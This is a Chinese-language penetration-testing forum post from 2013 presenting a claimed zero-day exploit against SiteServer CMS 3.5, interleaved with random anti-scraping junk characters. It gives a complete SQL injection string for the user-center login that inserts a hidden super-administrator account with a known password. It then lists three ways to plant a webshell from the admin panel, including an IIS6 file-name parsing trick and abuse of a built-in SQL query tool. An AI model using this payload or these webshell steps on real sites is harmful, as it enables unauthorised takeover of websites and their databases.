中国网络渗透测试联盟

标题: SiteServer CMS 0Day [打印本页]
作者: admin    时间: 2013-1-11 21:10
标题: SiteServer CMS 0Day
经测试秒杀最新的3.5版
% C* |. B7 b* q& r0 O. r( j" @
6 G4 a0 t% W( G/ Bstieserver官网:www.siteserver.cn  A% T2 i: M1 E' b. Q
/ }" [$ k+ j; u/ Y* H5 `4 e6 {; K
# p3 n1 m8 x, V  M0 U
* `: g. q/ B9 K: ]; O9 A* Q1 e
EXP:
' K& O3 e5 q$ m% w7 U0 Y! c3 `3 N0 L8 A' [. v, x
直接访问UserCenter/login.aspx
! K: w' x5 w" \- O
, D* ]+ W; `7 o: D/ k% n9 k 3 ]# j, {" z' J( z+ I# J) Y

2 c. k8 n5 W+ x, Q% J7 {1 r用户名处输入:
2 n/ x, U! g0 }% L6 g
6 {( V/ t! e/ F3 L1 w- J& R9 ]123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--
9 ~9 A% z- o  Y8 [! M" K
1 \, {- Z$ S* ~" g
9 H! \9 j; A$ O% j  w; w" m9 y% Z, h, B* _% d' o& ]2 Y
密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue  密码为lanhai的超级用户。
) ~( q! b. v1 \, \
2 t9 p' ]1 s. @, m* z5 L
3 V" j( n1 k0 T3 B4 c( Q  K- F* n+ C- |+ V
之后再访问后台SiteServer/login.aspx用插入的用户登陆0 [9 E9 N2 v2 q( X$ ^* e* G" I

0 G4 d3 C% |% k" k
* n- {7 E4 ]  E, j4 [
9 d8 `3 M/ {, }0 `/ C9 L% O4 s后台拿webshell的三种方法:
0 o. q, k+ y4 C4 G6 B) r4 h+ l% G. j# |4 z  ]' k7 t
一、) h9 @# [. d0 d
7 Q& [; d8 O$ v3 z6 y# v  I
站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx% v$ }6 r( M, ]
7 U$ o3 I5 O1 Y4 s; H
二、
) O, G8 z- u, E
, P- ^$ i4 A' K2 N8 V成员权限-》添加用户-》用户名为:1.asp
6 W2 j% V. x* D' `# J+ {1 L, ~, G# F& n4 d
http://127.0.0.1/usercenter/
" Z4 y9 `% W: R. D- X3 B; n
" T, N' M/ {* ?. n3 o用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell
2 g7 d# m" k+ x8 z! Z- ^
. G8 j* p& i) \& S2 L9 f9 x(ps:后台添加用户时不会验证是否含有非法字符)" p% l. Z* O9 n7 s% r

9 `* B. r* x. t8 R3 {( g6 j- y三、5 O/ D) W0 I' p9 ?' `

2 j9 `, `9 r2 J2 W- h: |1 n8 Y系统工具-》实用工具-》机器参数查看
4 s( M; R8 x+ H2 n# Z0 E7 k, L可以看到数据库类型、名称,WEB路径
4 z% t3 m9 ]# I1 v, Y
8 B# X5 o2 Y# I! ?- m* T' O5 X% g* G系统工具-》数据库工具-》SQL语句查询$ }, |+ J5 N+ H3 A9 d/ [3 q, x! _
这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO。
& p4 y0 ?; \7 B& W- M6 o8 B# \9 b5 {




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2